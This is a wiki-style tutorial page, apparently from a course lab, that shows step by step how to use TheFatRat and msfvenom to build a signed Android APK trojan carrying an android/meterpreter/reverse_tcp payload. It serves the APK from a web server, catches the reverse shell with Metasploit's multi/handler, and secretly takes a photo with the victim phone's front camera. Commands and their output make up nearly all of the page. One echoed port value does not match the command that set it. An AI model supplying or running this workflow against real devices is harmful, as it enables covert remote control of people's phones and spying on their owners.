Metasploit trojaner android fatrat

Aus xinux.net
Zur Navigation springen Zur Suche springen

TheFatRat

Install

Start

  • ./fatrat

Thefatrat2.png

Create Backdoor with msfvenom

  • Create Backdoor with msfvenom
    • SIGNED ANDROID >> FatRat.apk
      • Set LHOST IP: 10.81.1.91
      • Set LPORT: 7771
      • Please enter the base name for output files : carlos
    • android/meterpreter/reverse_tcp

Resultat

  Generate Backdoor
  +------------++-------------------------++-----------------------+
  | Name       ||  Descript   	          || Your Input
  +------------++-------------------------++-----------------------+
  | LHOST      ||  The Listen Addres      || 10.81.1.91
  | LPORT      ||  The Listen Ports       || 7771
  | OUTPUTNAME ||  The Filename output    || carlos
  | PAYLOAD    ||  Payload To Be Used     || android/meterpreter/reverse_tcp
  +------------++-------------------------++-----------------------+




[ +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ]
 
[*] Creating RAT payload with msfvenom
[✔] Done!
[*] Creating a Valid Certificate
[✔] Done!
[*] Signing your payload APK
[✔] Done!

 Do you want to create a listener for this configuration
 to use in msfconsole in future ?

bring apk to the host

  • mv backdoored/carlos.apk /var/www/html/

Metasploit Console

  • msfconsole
  • msf > use multi/handler
  • msf exploit(handler) > set PAYLOAD android/meterpreter/reverse_tcp
PAYLOAD => android/meterpreter/reverse_tcp
  • msf exploit(handler) > set LHOST 10.81.1.91
LHOST => 10.81.1.91
  • msf exploit(handler) > set LPORT 7771
LPORT => 7774
  • msf exploit(handler) > exploit
[*] Exploit running as background job 0. 

[*] Started reverse TCP handler on 10.81.1.91:7771

Connect

msf exploit(handler) > [*] Sending stage (69050 bytes) to 10.81.1.12
[*] Meterpreter session 1 opened (10.81.1.91:7771 -> 10.81.1.12:50464) at 2017-11-11 14:33:18 +0100

Show the sessions

  • msf exploit(handler) > sessions
Active sessions
===============

  Id  Name  Type                        Information          Connection
  --  ----  ----                        -----------          ----------
  1         meterpreter dalvik/android  u0_a101 @ localhost  10.81.1.91:7771 -> 10.81.1.12:50464 (10.81.1.12)

Change to the session

  • msf exploit(handler) > sessions 1
[*] Starting interaction with 1...

Getting started

  • meterpreter > pwd
/data/user/0/com.metasploit.stage/files
  • meterpreter > webcam_list
1: Back Camera
2: Front Camera

meterpreter > webcam_snap 2 

[*] Starting...
[+] Got frame
[*] Stopped
Webcam shot saved to: /root/zhJgKAww.jpeg

Links

Abgerufen von „https://xinux.net/index.php?title=Metasploit_trojaner_android_fatrat&oldid=18413